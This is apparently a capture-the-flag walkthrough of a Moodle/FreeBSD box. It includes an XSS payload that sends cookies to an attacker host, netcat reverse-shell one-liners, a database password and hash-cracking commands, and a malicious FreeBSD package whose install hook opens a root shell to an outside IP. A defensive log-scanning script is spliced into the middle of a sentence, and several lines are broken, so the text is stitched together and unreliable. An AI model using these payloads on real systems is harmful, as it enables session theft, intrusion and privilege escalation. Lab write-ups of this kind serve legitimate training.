nmap Scan:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214;
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD)
Service Info: OS: FreeBSD;
Port 80 serves a web service, which says that all content will be delivered over Moodle.
Enumerating its subdomains:
gobuster dns -d erev0s.com -w su 0 -i
Let's get it :)
So let's enumerate more…
Once we enroll in the courses we can see some instructions.
MoodleNet profiles need to be set, hmm…
Let's check some exploits for Moodle.
Ah, we got some XSS, let's check that out.
Stored XSS works as intended.
Since the maths teacher said he will be checking the profile, using the stored XSS we can steal his cookie and log in as that teacher.
XSS Payload
<img src='x' onerror='fetch("http://[IP]/?data=" + btoa(document.cookie));'>
sudo python3 -m http.server <port>
So, replacing my cookie with the teacher's cookie, we can take over the teacher's
Hmm... there is an RCE vulnerability.
Using this vulnerability we were able to get RCE; to get a shell we will be using webwrap.
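From the defender's side, the callback made by the payload above also shows up in the school's own proxy or egress logs: an outbound GET from the teacher's browser carrying a base64 parameter that decodes to a session cookie, with the Referer pointing at the Moodle profile page hosting the XSS. The following is an added detection example (not from the original writeup) that scans constructed Apache-format log lines for exactly that pattern; the cookie names MoodleSession/PHPSESSID and the combined-log layout are assumptions.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (Apache combined log format); not taken from the original page.
SAMPLE_LOG = """\
10.10.10.5 - - [10/Apr/2021:10:01:02 +0000] "GET /?data=TW9vZGxlU2Vzc2lvbj1hYmMxMjM= HTTP/1.1" 200 - "http://moodle.schooled.htb/moodle/user/profile.php?id=42" "Mozilla/5.0"
10.10.10.9 - - [10/Apr/2021:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "curl/7.74"
10.10.10.9 - - [10/Apr/2021:10:01:07 +0000] "GET /search?q=moodle HTTP/1.1" 200 88 "-" "curl/7.74"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
# Assumed session cookie names to look for in the decoded parameter value.
SESSION_RE = re.compile(r'(?:MoodleSession|PHPSESSID)[^;]*')


def decode_b64(value):
    """Leniently base64-decode a query value; return text or None if it is not decodable."""
    value = value.replace(" ", "+")          # parse_qs turns an unencoded '+' into a space
    value += "=" * (-len(value) % 4)         # btoa() output is often sent without padding
    try:
        return base64.b64decode(value, validate=False).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def find_cookie_exfil(log_text):
    """Return one record per request whose query carries a base64-encoded session cookie."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, values in parse_qs(urlsplit(m["target"]).query).items():
            for raw in values:
                text = decode_b64(raw)
                found = SESSION_RE.search(text) if text else None
                if found:
                    hits.append({"src": m["src"], "ts": m["ts"], "param": param,
                                 "referer": m["referer"], "cookie": found.group(0)})
    return hits


if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(hit)
```

A hit whose Referer is a Moodle profile page is a strong sign that a stored XSS on that profile is exfiltrating sessions; setting Moodle's cookiehttponly option keeps the session cookie out of document.cookie in the first place.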
python3 webwrap.py http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=WRAP
and netcat to get a proper, stable shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port>>/tmp/f
Enumerating, we can see that there are two users.
We don't have access though; enumerating further, we can see Moodle uses MySQL, so finding Moodle's config.php reveals the MySQL username and password.
config.php is located under:
/usr/local/www/apache24/data/moodle
The mysql client is located in /usr/local/bin:
./mysql -u moodle -pPlaybookMaster2020 -D moodle -e 'SELECT username, password FROM mdl_user ORDER BY username;'
This gives the admin username and password hash; cracking the hash with hashcat:
hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt
Logging in as admin, we can see that
So he is one of the users we found; SSH in as this user.
Enumerating, we can see that we have sudo permission for package installation:
#!/bin/bash
# Build a FreeBSD pkg whose install hooks run with the installer's (root) privileges
STAGEDIR=/tmp/package
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.7 9080 >/tmp/a
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
pw usermod -n root -s /bin/sh
EOF
# Minimal manifest so pkg accepts the package
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .
mkdir /temp/package
Installing this package gives us the superuser shell.